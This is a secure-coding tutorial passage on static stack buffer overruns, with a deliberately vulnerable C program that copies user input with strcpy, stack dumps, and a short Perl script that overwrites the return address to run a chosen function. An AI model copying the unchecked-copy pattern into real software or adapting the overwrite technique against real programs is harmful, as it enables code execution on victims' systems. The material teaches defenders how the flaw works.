Static Buffer Overruns
A static buffer overrun occurs when a buffer declared on the stack is overwritten by copying data larger than the buffer. Variables declared on the stack are located next to the return address for the caller of the function. The usual culprit is unchecked user input passed to a function such as strcpy, and the result is that the return address for the function gets overwritten by an address chosen by the attacker.
The following figure shows a sample stack at the top. The problem is that Buffer in bar() can be overwritten with the code from the attacker, so when Return Address to fog() is processed, the address is returned to the assembly code of the attacker, as shown in the second box. The attacker can add the two together using a simple copy function, shown in the third box.
To accomplish this, the attacker often has to overcome some problems, such as the fact that the user input is not completely unchecked or that only a limited number of characters will fit in the buffer. If you are working with double-byte character sets, the attacker might have to work harder, but the problems this introduces are not insurmountable.
The following program written in C shows a simple exploit of an overrun.
/*This program shows an example of how a static
buffer overrun can be used to execute arbitrary code. Its
objective is to find an input string that executes the function bar.
*/
#include <stdio.h>
#include <string.h>
void foo(const char* input)
{
char buf[10];
//What? No extra arguments supplied to printf?
//It is a cheap trick to view the stack
printf("My stack looks like:\n%p\n%p\n%p\n%p\n%p\n%p\n\n");
//Pass the user input straight to secure code public enemy #1.
strcpy(buf, input);
printf("%s\n", buf);
printf("Now the stack looks like:\n%p\n%p\n%p\n%p\n%p\n%p\n\n");
}
void bar(void)
{
printf("The attack!\n");
}
int main(int argc, char* argv[])
{
//A blatant shortcut
printf("Address of foo = %p\n", foo);
printf("Address of bar = %p\n", bar);
foo(argv[1]);
return 0;
}
This application is nearly as simple as writing "Hello, World." It starts off printing the addresses of the two functions, foo and bar, by using the %p option of the printf function, which displays an address. A real attacker hacking into an application might try to jump back into the static buffer declared in foo or find a useful function loaded from a system dynamic-link library (DLL). The objective of this exercise is to get the bar function to execute. The foo function contains a pair of printf statements that use a side effect of variable-argument functions to print the values on the stack. The problem occurs when the foo function blindly accepts user input and copies it into a 10-byte buffer.
The following is a sample for using a string as the command line argument:
[d:\]StaticOverrun.exe Hello
Address of foo = 00401000
Address of bar = 00401045
My stack looks like:
00000000
00000000
7FFDF000
0012FF80
0040108A <-- To overwrite the return address for foo.
00410EDE
Hello
Now the stack looks like:
6C6C6548 <-- You can see where "Hello" was copied in.
0000006F
7FFDF000
0012FF80
0040108A
00410EDE
Now, to test for buffer overruns, input a long string:
[d:\]StaticOverrun.exe AAAAAAAAAAAAAAAAAAAAAAAA
Address of foo = 00401000
Address of bar = 00401045
My stack looks like:
00000000
00000000
7FFDF000
0012FF80
0040108A
00410ECE
AAAAAAAAAAAAAAAAAAAAAAAA
Now the stack looks like:
41414141
41414141
41414141
41414141
41414141
41414141
And the application error message is displayed, claiming the instruction at 0x41414141 tried to access memory at address 0x41414141.
Following is an example of how to find the characters that you need to input to the application:
[d:\]StaticOverrun.exe ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
Address of foo = 00401000
Address of bar = 00401045
My stack looks like:
00000000
00000000
7FFDF000
0012FF80
0040108A
00410EBE
ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
Now the stack looks like:
44434241
48474645
4C4B4A49
504F4E4D
54535251
58575655
The application error message now shows that the attacker is trying to execute instructions at 0x54535251. If he looks at the ASCII charts, he sees that 0x54 is the code for the letter "T," so that is what he would like to modify.
By changing the user input, the attacker is able to manipulate where the program tries to execute the next instruction. For example:
[d:\]StaticOverrun.exe ABCDEFGHIJKLMNOPQRS
Address of foo = 00401000
Address of bar = 00401045
My stack looks like:
00000000
00000000
7FFDF000
0012FF80
0040108A
00410ECE
ABCDEFGHIJKLMNOPQRS
Now the stack looks like:
44434241
48474645
4C4B4A49
504F4E4D
00535251
00410ECE
If the attacker could send it 0x45, 0x10, 0x40 instead of QRS, he could get bar to execute. To pass these odd characters—0x10 is not printable—on the command line, an attacker can use the following Perl script named HackOverrun.pl to easily send the application an arbitrary command line:
$arg = "ABCDEFGHIJKLMNOP"."\x45\x10\x40";
$cmd = "StaticOverrun ".$arg;
system($cmd);
Running this script produces the desired result:
[d:\devstudio\myprojects\staticoverrun]perl HackOverrun.pl
Address of foo = 00401000
Address of bar = 00401045
My stack looks like:
77FB80DB
77F94E68
7FFDF000
0012FF80
0040108A
00410ECA
ABCDEFGHIJKLMNOPE?@
Now the stack looks like:
44434241
48474645
4C4B4A49
504F4E4D
00401045
00410ECA
You have been hacked!
In a real attack, the attacker would fill the first 16 characters with assembly code designed to do bad things to the victim and set the return address to the start of the buffer.
Note
- The 64-bit Intel Itanium processor does not push the return address on the stack; rather, the return address is held in a register. This does not mean the processor is not susceptible to buffer overruns. It is just more difficult to make the overrun exploitable.
Copyright © 2005 Microsoft Corporation.
All rights reserved.